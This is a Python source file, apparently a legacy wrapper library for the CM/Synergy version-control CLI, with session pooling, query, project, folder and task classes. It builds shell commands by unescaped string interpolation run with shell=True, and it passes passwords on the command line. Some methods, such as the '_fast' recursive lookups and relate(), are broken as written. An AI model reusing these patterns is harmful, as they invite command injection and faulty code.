result = self.execute("project_purpose -show %s" % args, ProjectPurposeResult(self))
return result.output
class Session(AbstractSession):
"""A Synergy session.
"""
def __init__(self, username, engine, dbpath, ccm_addr, close_on_exit=True):
AbstractSession.__init__(self, username, engine, dbpath, ccm_addr)
self._execute_lock = threading.Lock()
self.close_on_exit = close_on_exit
@staticmethod
def start(username, password, engine, dbpath, timeout=300):
if username == None:
raise CCMException('username is not valid')
if password == None:
raise CCMException('password is not valid')
if CCM_BIN == None:
raise CCMException("Could not find CM/Synergy executable in the path.")
command = "%s start -m -q -nogui -n %s -pw %s -h %s -d %s" % \
(CCM_BIN, username, password, engine, dbpath)
_logger.debug('Starting new session:' + command.replace(password, "***"))
(result, status) = _execute(command, timeout=timeout)
if status != 0:
raise Exception("Error creating a session: result:\n%s\nCommand: %s" % (result, command.replace(password, "***")))
session_addr = result.strip()
_logger.debug(session_addr)
if not re.match(r'[a-zA-Z0-9_-]+:\d+:\d+\.\d+\.\d+\.\d+(:\d+\.\d+\.\d+\.\d+)?', session_addr):
raise Exception("Error creating a session: result:\n%s" % result)
return Session(username, engine, dbpath, session_addr)
def execute(self, cmdline, result=None):
""" Executes a Synergy CLI operation. """
if self._session_addr == None:
raise CCMException("No Synergy session running")
if CCM_BIN == None:
raise CCMException("Could not find CM/Synergy executable in the path.")
self._execute_lock.acquire()
output = ""
error = ""
try:
if result == None:
result = Result(self)
if os.sep == '\\':
command = "set CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " %s" % cmdline
else:
command = "export CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " %s" % cmdline
_logger.debug('Execute > ' + command)
if hasattr(result, 'error'):
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = process.stdout.read()
error = process.stderr.read()
result.status = process.returncode
else:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output = process.stdout.read()
result.status = process.returncode
finally:
self._execute_lock.release()
result.output = output.strip()
if hasattr(result, 'error'):
result.error = error.strip()
return result
def close(self):
""" Closes this Synergy session if it was not previously running anyway. """
_logger.debug("Closing session %s" % self._session_addr)
if self._session_addr != None and self.close_on_exit:
_logger.debug("Closing session %s" % self._session_addr)
self._execute_lock.acquire()
if os.sep == '\\':
command = "set CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " stop"
else:
command = "export CCM_ADDR=" + self._session_addr + " && " + CCM_BIN + " stop"
_logger.debug('Execute > ' + command)
pipe = os.popen(command)
pipe.close()
self._session_addr = None
self._execute_lock.release()
elif self._session_addr != None and not self.close_on_exit:
_logger.debug("Keeping session %s alive." % self._session_addr)
class SessionPool(AbstractSession):
""" Session that transparently handled several subsession, to easily enable
multithreaded application.
"""
def __init__(self, username, password, engine, dbpath, database=None, size=4, opener=None):
AbstractSession.__init__(self, username, engine, dbpath, None)
self._opener = opener
if self._opener is None:
self._opener = open_session
self._free_sessions = []
self._used_sessions = []
self._thread_sessions = {}
self._pool_lock = threading.Condition()
self._lock_pool = False
self.__password = password
self.__database = database
self.size = size
def _set_size(self, size):
""" Set the pool size """
self._pool_lock.acquire()
poolsize = len(self._free_sessions) + len(self._used_sessions)
if poolsize > size:
to_be_remove = poolsize - size
self._lock_pool = True
while len(self._free_sessions) < to_be_remove:
self._pool_lock.wait()
for _ in range(to_be_remove):
self._free_sessions.pop().close()
self._lock_pool = False
else:
for _ in range(size - poolsize):
self._free_sessions.append(self._opener(self.username, self.__password, self.engine, self.dbpath, self.__database, False))
self._pool_lock.release()
def _get_size(self):
self._pool_lock.acquire()
poolsize = len(self._free_sessions) + len(self._used_sessions)
self._pool_lock.release()
return poolsize
size = property (_get_size, _set_size)
def execute(self, cmdline, result=None):
""" Executing a ccm command on a free session. """
_logger.debug("SessionPool:execute: %s %s" % (cmdline, type(result)))
# waiting for a free session
self._pool_lock.acquire()
# check for recursion, in that case reallocate the same session,
if threading.currentThread() in self._thread_sessions:
_logger.debug("Same thread, reusing allocation session.")
# release the pool and reuse associated session
self._pool_lock.release()
return self._thread_sessions[threading.currentThread()].execute(cmdline, result)
while len(self._free_sessions)==0 or self._lock_pool:
self._pool_lock.wait()
session = self._free_sessions.pop(0)
self._used_sessions.append(session)
self._thread_sessions[threading.currentThread()] = session
self._pool_lock.release()
# running command
try:
result = session.execute(cmdline, result)
finally:
# we can now release the session - anyway
self._pool_lock.acquire()
self._thread_sessions.pop(threading.currentThread())
self._used_sessions.remove(session)
self._free_sessions.append(session)
self._pool_lock.notifyAll()
self._pool_lock.release()
return result
def close(self):
""" Closing all subsessions. """
_logger.debug("Closing session pool sub-sessions")
self._lock_pool = True
self._pool_lock.acquire()
while len(self._used_sessions) > 0:
_logger.debug("Waiting to free used sessions.")
_logger.debug("Waiting to free used sessions. %s %s" % (len(self._used_sessions), len(self._free_sessions)))
_logger.debug(self._used_sessions)
_logger.debug(self._free_sessions)
self._pool_lock.wait()
_logger.debug("Closing all free session from the pool.")
while len(self._free_sessions) > 0:
self._free_sessions.pop().close()
self._lock_pool = False
self._pool_lock.notifyAll()
self._pool_lock.release()
def _set_role_internal(self, role):
""" Set role on all subsessions. """
self._lock_pool = True
self._pool_lock.acquire()
while len(self._used_sessions)!=0:
self._pool_lock.wait()
try:
for session in self._free_sessions:
session.role = session._set_role(role)
finally:
self._lock_pool = False
self._pool_lock.notifyAll()
self._pool_lock.release()
class Query(object):
""" This object wrap a synergy query, it takes a query as input as well as the
attribute you want as output, and get them translated using the model configuration.
e.g
Query(session, "type='task' and release='test/next'", ['objectname', 'task_synopsis'], ['ccmobject', 'string'])
This will return a list of hash: [{'objectname': Task(xxx), 'task_synopsis': 'xxx'}, ...]
"""
def __init__(self, session, query, keywords, model, cmd="query"):
""" Initialize a Synergy query."""
self._session = session
self._query = query
self._keywords = keywords
self._model = model
self._cmd = cmd
def execute(self):
""" Executing the query on the database. """
mapper = DataMapperListResult(self._session, '@@@', self._keywords, self._model)
query = "%s %s -u -f \"%s\"" % (self._cmd, self._query, mapper.format())
return self._session.execute(query, mapper)
class InvalidFourPartNameException(CCMException):
""" Badly formed Synergy four-part name. """
def __init__(self, fpn = ""):
CCMException.__init__(self, fpn)
class FourPartName(object):
""" This class handle four part name parsing and validation.
"""
def __init__(self, ifpn):
""" Create a FourPartName object based on a ifpn string.
The string have to match the following patterns:
- name-version:type:instance
- name:version:releasedef:instance
- Task database#id
- Folder database#id
Anything else is considered as old release string format.
"""
_logger.debug("FourPartName: '%s'", ifpn)
fpn = FourPartName.convert(ifpn)
result = re.search(r"^(?P<name>.+)-(?P<version>.+?):(?P<type>\S+):(?P<instance>\S+)$", fpn)
if result == None:
result = re.search(r"^(?P<name>.+):(?P<version>.+?):(?P<type>releasedef):(?P<instance>\S+)$", fpn)
if result == None:
raise InvalidFourPartNameException(fpn)
# set all attributes
self._name = result.groupdict()['name']
self._version = result.groupdict()['version']
self._type = result.groupdict()['type']
self._instance = result.groupdict()['instance']
def __getname(self):
""" Returns the name of the object. """
return self._name
def __getversion(self):
""" Returns the version of the object. """
return self._version
def __gettype(self):
""" Returns the type of the object. """
return self._type
def __getinstance(self):
""" Returns the instance of the object. """
return self._instance
def __getobjectname(self):
""" Returns the objectname of the object. """
if (self.type == 'releasedef'):
return "%s:%s:%s:%s" % (self.name, self.version, self.type, self.instance)
return "%s-%s:%s:%s" % (self.name, self.version, self.type, self.instance)
def __str__(self):
""" Returns the string representation of the object. """
return self.objectname
def __repr__(self):
""" Returns the string representation of the python object. """
if (self.type == 'releasedef'):
return "<%s:%s:%s:%s>" % (self.name, self.version, self.type, self.instance)
return "<%s-%s:%s:%s>" % (self.name, self.version, self.type, self.instance)
def is_same_family(self, ccmobject):
""" Returns True if the ccmobject is part of the same family (=same name, type and instance) as self. """
assert isinstance(ccmobject, FourPartName)
return (self.name == ccmobject.name and self.type == ccmobject.type and self.instance == ccmobject.instance)
def __getfamily(self):
return "%s:%s:%s" % (self.name, self.type, self.instance)
def __eq__(self, ccmobject):
""" Returns True if object four parts name are identical. """
if ccmobject == None:
return False
assert isinstance(ccmobject, FourPartName)
return (self.name == ccmobject.name and self.version == ccmobject.version and self.type == ccmobject.type and self.instance == ccmobject.instance)
def __ne__(self, ccmobject):
""" Returns True if object four parts name are different. """
if ccmobject == None:
return True
assert isinstance(ccmobject, FourPartName)
return (self.name != ccmobject.name or self.version != ccmobject.version or self.type != ccmobject.type or self.instance != ccmobject.instance)
@staticmethod
def is_valid(fpn):
""" Check if a given string represents a valid four part name.
"""
return (re.match(r"^(.+)-(.+?):(\S+):(\S+)|(.+):(.+?):releasedef:(\S+)$", fpn) != None)
@staticmethod
def convert(fpn):
""" Update a CCM output string to a valid four part name. This is due to the inconsistent
output of CM/Synergy CLI.
"""
fpn = fpn.strip()
if FourPartName.is_valid(fpn):
return fpn
result = re.search(r"^(?P<type>Task|Folder)\s+(?P<instance>\w+)#(?P<id>\d+)$", fpn)
if result != None:
matches = result.groupdict()
if matches["type"] == "Task":
return "task%s-1:task:%s" % (matches["id"], matches["instance"])
elif matches["type"] == "Folder":
return "%s-1:folder:%s" % (matches['id'], matches['instance'])
else:
result = re.search(r"^(?P<project>\S+)/(?P<version>\S+)$", fpn)
if result != None:
matches = result.groupdict()
return "%s:%s:releasedef:1" % (matches['project'], matches['version'])
else:
# Check the name doesn't contains any of the following character: " :-"
result = re.search(r"^[^\s^:^-]+$", fpn)
if result != None:
return "none:%s:releasedef:1" % (fpn)
raise InvalidFourPartNameException(fpn)
name = property (__getname)
version = property (__getversion)
type = property (__gettype)
instance = property (__getinstance)
objectname = property (__getobjectname)
family = property(__getfamily)
class CCMObject(FourPartName):
""" Base class for any Synergy object. """
def __init__(self, session, fpn):
FourPartName.__init__(self, fpn)
self._session = session
def _getsession(self):
return self._session
session = property(_getsession)
def exists(self):
""" Check if an the object exists in the database. """
return (len(self._session.execute("query \"name='%s' and version='%s' and type='%s' and instance='%s'\" -u -f \"%%objectname\"" % (self.name, self.version, self.type, self.instance), ObjectListResult(self._session)).output) == 1)
def __setitem__(self, name, value):
project = ""
if self.type == 'project':
project = "-p"
if value.endswith("\\"):
value += "\\"
result = self._session.execute("attribute -modify \"%s\" -v \"%s\" %s \"%s\"" % (name, value, project, self))
if result.status != 0 and result.status != None:
raise CCMException("Error modifying '%s' attribute. Result: '%s'" % (name, result.output), result)
def __getitem__(self, name):
""" Provides access to Synergy object attributes through the dictionary
item interface.
"""
result = self._session.execute("query \"name='%s' and version='%s' and type='%s' and instance='%s'\" -u -f \"%%%s\"" % (self.name, self.version, self.type, self.instance, name), ResultWithError(self._session))
if result.status != 0 and result.status != None:
raise CCMException("Error retrieving '%s' attribute. Result: '%s'" % (name, result.output), result)
if len(result.error.strip()) > 0:
raise CCMException("Error retrieving '%s' attribute. Reason: '%s'" % (name, result.error), result)
if result.output.strip() == "<void>":
return None
return result.output.strip()
def create_attribute(self, name, type_, value=None):
if name in self.keys():
raise CCMException("Attribute '%s' already exist." % (name))
args = ""
proj_arg = ""
if value != None:
args += " -value \"%s\"" % value
if self.type == "project":
proj_arg = "-p"
result = self._session.execute("attribute -create \"%s\" -type \"%s\" %s %s \"%s\"" % (name, type_, args, proj_arg, self.objectname))
if result.status != 0 and result.status != None:
raise CCMException("Error creating '%s' attribute. Result: '%s'" % (name, result.output), result)
def keys(self):
""" The list of supported Synergy attributes. """
result = self._session.execute("attribute -la \"%s\"" % self, AttributeNameListResult(self._session))
return result.output
def is_predecessor_of(self, o):
result = self._session.execute("query \"is_predecessor_of('%s') and name='%s'and version='%s'and type='%s'and instance='%s'\" -u -f \"%%objectname\"" % (o, self.name, self.version, self.type, self.instance), ObjectListResult(self._session))
if len(result.output):
return True
return False
def predecessors(self):
result = self._session.execute("query \"is_predecessor_of('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
return result.output
def successors(self):
result = self._session.execute("query \"is_successor_of('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
return result.output
def is_recursive_predecessor_of(self, o):
result = self._session.execute("query \"has_predecessor('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
for s in result.output:
if s == o:
return True
for s in result.output:
if s.is_recursive_predecessor_of(o):
return True
return False
def is_recursive_predecessor_of_fast(self, o):
""" Fast implementation of the recursive is_predecessor_of method. """
input_objects = [self]
while len(input_objects) > 0:
query = " or ".join(["has_predecessor('%s')" % x for x in input_objects])
result = self._session.execute("query \"query\" -u -f \"%%objectname\"" % query, ObjectListResult(self._session))
for s in result.output:
if s == o:
return True
return False
def is_recursive_sucessor_of(self, o):
result = self._session.execute("query \"has_successor('%s')\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
for s in result.output:
if s == o:
return True
for s in result.output:
if s.is_recursive_sucessor_of(o):
return True
return False
def is_recursive_successor_of_fast(self, o):
""" Fast implementation of the recursive is_successor_of method. """
input_objects = [self]
while len(input_objects) > 0:
query = " or ".join(["has_successor('%s')" % x for x in input_objects])
result = self._session.execute("query \"query\" -u -f \"%%objectname\"" % query, ObjectListResult(self._session))
for s in result.output:
if s == o:
return True
return False
def relate(self, ccm_object):
result = self._session.execute("relate -name successor -from \"%s\" -to \"%s\"" % self, ccm_object, Result(self._session))
if result.status != None and result.status != 0:
raise CCMException("Error relating objects %s to %s\n%s" % (self, ccm_object, result.output))
def finduse(self):
""" Tries to find where an object is used. """
result = self._session.execute("finduse \"%s\"" % self, FinduseResult(self))
return result.output
class File(CCMObject):
""" Wrapper for any Synergy file object """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
def content(self):
result = self._session.execute("cat \"%s\"" % self)
return result.output
def to_file(self, path):
if os.path.exists(path):
_logger.error("Error file %s already exists" % path)
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
# Content to file
result = self._session.execute("cat \"%s\" > \"%s\"" % (self, os.path.normpath(path)))
if result.status != 0 and result.status != None:
raise CCMException("Error retrieving content from object %s in %s (error status: %s)\n%s" % (self, path, result.status, result.output), result)
def merge(self, ccm_object, task):
assert ccm_object != None, "object must be defined."
assert task != None, "task must be defined."
assert task.type == "task", "task parameter must be of 'task' type."
result = self._session.execute("merge -task %s \"%s\" \"%s\"" % (task['displayname'], self, ccm_object))
validity = 0
for line in result.output.splitlines():
if re.match(r"Merge Source completed successfully\.", line):
validity = 2
elif re.match(r"Warning: Merge Source warning. \(overlaps during merge\)\.", line):
validity = 1
else:
result = re.match(r"Associated object\s+(?P<object>.+)\s+with task", line)
if result != None:
return (self._session.create(result.groupdict()['object']), validity)
raise CCMException("Error during merge operation.\n" + result.output, result)
def checkin(self, state, comment=None):
if comment != None:
comment = "-c \"%s\"" % comment
else:
comment = "-nc"
result = self._session.execute("checkin -s \"%s\" %s \"%s\" " % (state, comment, self))
for line in result.output.splitlines():
_logger.debug(line)
_logger.debug(r"Checked\s+in\s+'.+'\s+to\s+'%s'" % state)
if re.match(r"Checked\s+in\s+'.+'\s+to\s+'%s'" % state, line) != None:
return
raise CCMException("Error checking in object %s,\n%s" % (self, result.output), result)
class Project(CCMObject):
""" Wrapper class for Synergy project object. """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
self._release = None
self._baseline = None
def _gettasks(self):
result = self._session.execute("rp -show tasks \"%s\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
return result.output
def add_task(self, task):
""" Add a task to the update properties. """
result = self._session.execute("up -add -task %s \"%s\"" % (task['displayname'], self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error adding task %s to project '%s'\n%s" % (task, self, result.output))
def remove_task(self, task):
""" Remove a task to the update properties. """
result = self._session.execute("up -remove -task %s \"%s\"" % (task['displayname'], self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error removing task %s from project '%s'\n%s" % (task, self, result.output))
def add_folder(self, folder):
""" Add a folder to the update properties. """
result = self._session.execute("up -add -folder %s \"%s\"" % (folder['displayname'], self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error adding folder %s to project '%s'\n%s" % (folder, self, result.output))
def remove_folder(self, folder):
""" Remove a folder to the update properties. """
result = self._session.execute("up -remove -folder %s \"%s\"" % (folder['displayname'], self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error removing folder %s to project '%s'\n%s" % (folder, self, result.output))
def _getfolders(self):
""" Wrapper method to return the folder list from the update properties - please use the folders attribute to access it. """
result = self._session.execute("up -show folders \"%s\" -u -f \"%%objectname\"" % self, ObjectListResult(self._session))
return result.output
def _getsubprojects(self):
""" Wrapper method to return the subprojects list - please use the subprojects attribute to access it. """
result = self._session.execute("query -t project \"recursive_is_member_of('%s', none)\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
return result.output
def get_members(self, recursive=False, **kargs):
query = "is_member_of('%s')" % self.objectname
if recursive:
query = "recursive_is_member_of('%s', none)" % self.objectname
for k in kargs.keys():
query += " and %s='%s'" % (k, kargs[k])
result = self._session.execute("query \"%s\" -u -f \"%%objectname\"" % query, ObjectListResult(self._session))
return result.output
def _getrelease(self):
""" Get the release of the current object. Returns a Releasedef object. """
self._release = Releasedef(self._session, self['release'])
return self._release
def _setrelease(self, release):
""" Set the release of the current object. """
self['release'] = release['displayname']
def refresh(self):
""" Refresh project update properties. """
result = self._session.execute("up -refresh \"%s\"" % self.objectname, UpdatePropertiesRefreshResult(self._session))
return result.output
def _getbaseline(self):
""" Get the baseline of the current project. """
if self._baseline == None:
result = self._session.execute("up -show baseline_project \"%s\" -f \"%%displayname\" -u" % self.objectname)
if result.output.strip().endswith('does not have a baseline project.'):
return None
self._baseline = self._session.create(result.output)
_logger.debug('baseline: %s' % self._baseline)
return self._baseline
def set_baseline(self, baseline, recurse=False):
""" Set project baseline. raise a CCMException in case or error. """
args = ""
if recurse:
args += " -r"
self._baseline = None
result = self._session.execute("up -mb \"%s\" %s \"%s\"" % (baseline, args, self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error setting basline of project '%s'\n%s" % (self.objectname, result.output))
def set_update_method(self, name, recurse = False):
""" Set the update method for the project (and subproject if recurse is True). """
assert name != None, "name must not be None."
assert len(name) > 0, "name must not be an empty string."
args = "-ru %s" % name
if recurse:
args += " -r"
result = self._session.execute("up %s \"%s\"" % (args, self))
if result.status != None and result.status != 0:
raise CCMException("Error setting reconfigure properties to %s for project '%s'\nStatus: %s\n%s" % (name, self.objectname, result.status, result.output))
def apply_update_properties(self, baseline = True, tasks_and_folders = True, recurse=True):
""" Apply update properties to subprojects. """
args = ""
if not baseline:
args += "-no_baseline"
if not tasks_and_folders:
args += " -no_tasks_and_folders"
if recurse:
args += " -apply_to_subprojs"
result = self._session.execute("rp %s \"%s\"" % (args, self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error applying update properties to subprojects for '%s'\n%s" % (self.objectname, result.output))
def root_dir(self):
""" Return the directory attached to a project. """
result = self._session.execute("query \"is_child_of('%s','%s')\" -u -f \"%%objectname\"" % (self.objectname, self.objectname), ObjectListResult(self._session))
return result.output[0]
def snapshot(self, targetdir, recursive=False):
""" Take a snapshot of the project. """
assert targetdir != None, "targetdir must be defined."
if recursive:
recursive = "-recurse"
else:
recursive = ""
result = self._session.execute("wa_snapshot -path \"%s\" %s \"%s\"" % (os.path.normpath(targetdir), recursive, self.objectname))
for line in result.output.splitlines():
if re.match(r"^Creation of snapshot work area complete.|Copying to file system complete\.\s*$", line):
return result.output
raise CCMException("Error creation snapshot of %s,\n%s" % (self.objectname, result.output), result)
def checkout(self, release, version=None, purpose=None, subprojects=True):
""" Create a checkout of this project.
This will only checkout the project in Synergy. It does not create a work area.
:param release: The Synergy release tag to use.
:param version: The new version to use for the project. This is applied to all subprojects.
:param purpose: The purpose of the checkout. Determines automatically the role from the purpose
and switch it automatically (Could be any role from the DB).
"""
assert release != None, "Release object must be defined."
if not release.exists():
raise CCMException("Release '%s' must exist in the database." % release)
args = ''
if version != None:
args += '-to "%s"' % version
role = None
if purpose:
#save current role before changing
role = self._session.role
self._session.role = get_role_for_purpose(self._session, purpose)
args += " -purpose \"%s\"" % purpose
if subprojects:
args += " -subprojects"
result = self._session.execute("checkout -project \"%s\" -release \"%s\" -no_wa %s" \
% (self, release['displayname'], args), ProjectCheckoutResult(self._session, self.objectname))
if not role is None:
self._session.role = role
if result.project == None:
raise CCMException("Error checking out project %s,\n%s" % (self.objectname, result.output), result)
return result
def work_area(self, maintain, recursive=None, relative=None, path=None, pst=None, wat=False):
""" Configure the work area. This allow to enable it or disable it, set the path, recursion... """
args = ""
if maintain:
args += "-wa"
else:
args += "-nwa"
# path
if path != None:
args += " -path \"%s\"" % path
# pst
if pst != None:
args += " -pst \"%s\"" % pst
# relative
if relative != None and relative:
args += " -relative"
elif relative != None and not relative:
args += " -not_relative"
# recursive
if recursive != None and recursive:
args += " -recurse"
elif recursive != None and not recursive:
args += " -no_recurse"
#wat
if wat:
args += " -wat"
result = self._session.execute("work_area -project \"%s\" %s" \
% (self.objectname, args), Result(self._session))
return result.output
def update(self, recurse=True, replaceprojects=True, keepgoing=False, result=None):
""" Update the project based on its reconfigure properties. """
args = ""
if recurse:
args += " -r "
if replaceprojects:
args += " -rs "
else:
args += " -ks "
if result == None:
result = UpdateResult(self._session)
result = self._session.execute("update %s -project %s" % (args, self.objectname), result)
if not result.successful and not keepgoing:
raise CCMException("Error updating %s" % (self.objectname), result)
return result
def reconcile(self, updatewa=True, recurse=True, consideruncontrolled=True, missingwafile=True, report=True):
""" Reconcile the project to force the work area to match the database. """
args = ""
if updatewa:
args += " -update_wa "
if recurse:
args += " -recurse "
if consideruncontrolled:
args += " -consider_uncontrolled "
if missingwafile:
args += " -missing_wa_file "
if report:
args += " -report reconcile.txt "
result = self._session.execute("reconcile %s -project %s" % (args, self.objectname), Result(self._session))
if re.search(r"There are no conflicts in the Work Area", result.output) == None and re.search(r"Reconcile completed", result.output) == None:
raise CCMException("Error reconciling %s,\n%s" % (self.objectname, result.output), result)
return result.output
def get_latest_baseline(self, filterstring="*", state="released"):
result = self._session.execute("query -n %s -t project -f \"%%displayname\" -s %s -u -ns \"version smatch'%s'\"" % (self.name, state, filterstring))
lines = result.output.splitlines()
return lines[-1]
def create_baseline(self, baseline_name, release, baseline_tag, purpose="System Testing", state="published_baseline"):
result = self._session.execute("baseline -create %s -release %s -purpose \"%s\" -vt %s -project \"%s\" -state \"%s\"" % (baseline_name, release, purpose, baseline_tag, self.objectname, state))
return result.output
def sync(self, recurse=False, static=False):
""" Synchronize project content. By default it is not been done recusively. (Not unittested)"""
args = ""
if recurse:
args += " -recurse"
if static:
args += " -static"
result = self._session.execute("sync %s -project \"%s\"" % (args, self.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error during synchronization of %s: %s." % (self.objectname, result.output))
return result.output
def conflicts(self, recurse=False, tasks=False):
args = "-noformat "
if recurse:
args += " -r"
if tasks:
args += " -t"
result = self._session.execute("conflicts %s \"%s\"" % (args, self.objectname), ConflictsResult(self._session))
if result.status != None and result.status != 0:
raise CCMException("Error during conflict detection of %s: %s." % (self.objectname, result))
return result
tasks = property(_gettasks)
folders = property(_getfolders)
subprojects = property(_getsubprojects)
release = property(_getrelease, _setrelease)
baseline = property(_getbaseline, set_baseline)
class Dir(CCMObject):
""" Wrapper class for Synergy dir object """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
def children(self, project):
assert(project.type == 'project')
result = self._session.execute("query \"is_child_of('%s','%s')\" -u -f \"%%objectname\"" % (self.objectname, project), ObjectListResult(self._session))
return result.output
class Releasedef(CCMObject):
""" Wrapper class for Synergy releasedef object """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
def _getcomponent(self):
return self.name
component = property(_getcomponent)
class Folder(CCMObject):
""" Wrapper class for Synergy folder object """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
def _gettasks(self):
""" Accessor for 'tasks' property. """
result = self._session.execute("folder -show tasks \"%s\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
return result.output
def _getobjects(self):
result = self._session.execute("folder -show objects \"%s\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
return result.output
def _getmode(self):
""" Get the mode used by the folder. """
result = self._session.execute("folder -show mode \"%s\"" % self.objectname)
return result.output.strip()
def _getquery(self):
""" Get the query that populate the folder. """
if self.mode.lower() == "query":
result = self._session.execute("folder -show query \"%s\"" % self.objectname)
return result.output.strip()
else:
raise CCMException("%s is not a query base folder." % (self.objectname))
def _getdescription(self):
""" Get the description associated with the folder. """
r = self._session.execute("query -t folder -n %s -i %s -u -f \"%%description\"" % (self.name, self.instance))
return r.output.strip()
def remove(self, task):
""" Remove task from this folder. """
result = self._session.execute("folder -m \"%s\" -remove_task \"%s\"" % (self.objectname, task.objectname))
if result.status != None and result.status != 0:
raise CCMException("Error removing task %s from %s: %s." % (task.objectname, self.objectname, result.output))
def update(self):
result = self._session.execute("folder -m -update -f \"%%objectname\"" % self.objectname)
if result.status != None and result.status != 0:
raise CCMException("Error updating the folder content %s: %s." % (self.objectname, result.output))
def append(self, task):
""" Associate an object to a task """
class AddTaskException(CCMException):
def __init__(self, reason, task, result):
CCMException.__init__(self, reason, result)
self.task = task
result = self._session.execute("folder -m -at \"%s\" \"%s\"" % (task.objectname, self.objectname))
if re.search(r"(Added 1 task to)|(is already in folder)", result.output, re.M) is None:
raise AddTaskException(result.output, result, task)
def copy(self, existing_folder):
""" Copy the contents of existing_folder into this folder.
This appends to the destination folder by default.
:param existing_folder: The destination Folder object.
"""
result = self._session.execute("folder -copy %s -existing %s -append" % (self.objectname, existing_folder), FolderCopyResult(self._session))
return result.output
objects = property(_getobjects)
tasks = property(_gettasks)
mode = property(_getmode)
query = property(_getquery)
is_query_based = property(lambda x: x.mode.lower() == "query")
description = property(_getdescription)
class Task(CCMObject):
""" Wrapper class for Synergy task object """
def __init__(self, session, fpn):
CCMObject.__init__(self, session, fpn)
self.__unicode_str_text = None
def _getobjects(self):
result = self._session.execute("task -show objects \"%s\" -u -f \"%%objectname\"" % self.objectname, ObjectListResult(self._session))
return result.output
def append(self, ccm_object):
""" Associate an object to a task """
class AddObjectException(CCMException):
def __init__(self, comment, ccm_object):
CCMException.__init__(self, comment)
self.ccm_object = ccm_object
result = self._session.execute("task -associate \"%s\" -object \"%s\"" % (self.objectname, ccm_object.objectname))
if not re.match(r"Associated object .+ with task .*\.", result.output, re.M):
raise AddObjectException(result.output)
def assign(self, username):
result = self._session.execute("task -modify \"%s\" -resolver %s" % (self.objectname, username))
if not re.match(r"Changed resolver of task", result.output, re.M):
raise CCMException("Error assigning task to user '%s',\n%s" % (username, result.output), result)
def _getsynopsis(self):
return self['task_synopsis']
@staticmethod
def create(session, release_tag, synopsis=""):
assert release_tag.type == "releasedef", "release_tag must be a CCM object wrapper of releasedef type"
result = session.execute("task -create -synopsis \"%s\" -release \"%s\"" % (synopsis, release_tag['displayname']), CreateNewTaskResult(session))
return result.output
objects = property(_getobjects)
def __unicode__(self):
# TODO: use optimised query that makes only 1 ccm query with suitable format
if self.__unicode_str_text == None:
self.__unicode_str_text = u'%s: %s' % (self['displayname'], self['task_synopsis'])
return self.__unicode_str_text
def __str__(self):
return self.__unicode__().encode('ascii', 'replace')
def get_release_tag(self):
""" Get task release. Use release property!"""
result = self._session.execute("attribute -show release \"%s\"" % (self.objectname), Result(self._session))
return result.output
def set_release_tag(self, release_tag):
""" Set task release. Use release property!"""
result = self._session.execute("attribute -modify release -value \"%s\" \"%s\"" % (release_tag, self.objectname), Result(self._session))
return result.output
release = property(get_release_tag, set_release_tag)
class UpdateTemplate:
""" Allow to access Update Template property using Release and Purpose. """
def __init__(self, releasedef, purpose):
assert(releasedef != None)
assert(purpose != None)
self._releasedef = releasedef
self._purpose = purpose
def objectname(self):
""" Return the objectname representing this virtual object. """
return "%s:%s" % (self._releasedef['displayname'], self._purpose)
def baseline_projects(self):
""" Query all projects for this UpdateTemplate. """
result = self._releasedef.session.execute("ut -sh baseline_projects \"%s\"" % self.objectname(), ObjectListResult(self._releasedef.session))
print result.output
return result.output
def information(self):
""" Query all projects for this UpdateTemplate. """
result = self._releasedef.session.execute("ut -sh information \"%s\"" % self.objectname(), UpdateTemplateInformation(self._releasedef.session))
print result.output
return result.output
def baseline_selection_mode(self):
""" The current Baseline selection mode """
result = self._releasedef.session.execute("ut -sh bsm \"%s\"" % self.objectname())
print result.output.strip()
return result.output.strip()
def read_ccmwaid_info(filename):
""" Read data from a ccmwaid file. This method is an helper to retreive a project from a physical location. """
ccmwaid = open(filename, 'r')
# first line: database
dbpath = os.path.dirname(ccmwaid.readline().strip())
database = os.path.basename(dbpath)
# 2nd line should be a timestamp
ccmwaid.readline().strip()
# 3rd line is the objectname
objectref = ccmwaid.readline().strip()
ccmwaid.close()
return {'dbpath': dbpath, 'database': database, 'objectname': objectref}
def create_project_from_path(session, path):
""" Uses the (_|.)ccmwaid.inf file to create a Project object. """
ccmwaid = ".ccmwaid.inf"
if os.name == 'nt':
ccmwaid = "_ccmwaid.inf"
if (not os.path.exists(path + "/" + ccmwaid)):
return None
result = read_ccmwaid_info(path + "/" + ccmwaid)
return session.create(result['objectname'])
def open_session(username=None, password=None, engine=None, dbpath=None, database=None, reuse=True):
"""Provides a Session object.
Attempts to return a Session, based either on existing Synergy
sessions or by creating a new one.
- If a .netrc file can be found on the user's personal drive,
that will be read to obtain Synergy login information if it
is defined there. This will be used to fill in any missing
parameters not passed in the call to open_session().
The format of the .netrc file entries should be:
machine synergy login USERNAME password foobar account DATABASE_PATH@SERVER
If the details refer to a specific database, the machine can be the database name,
instead of "synergy".
- If an existing session is running that matches the supplied
parameters, it will reuse that.
"""
# See if a .netrc file can be used
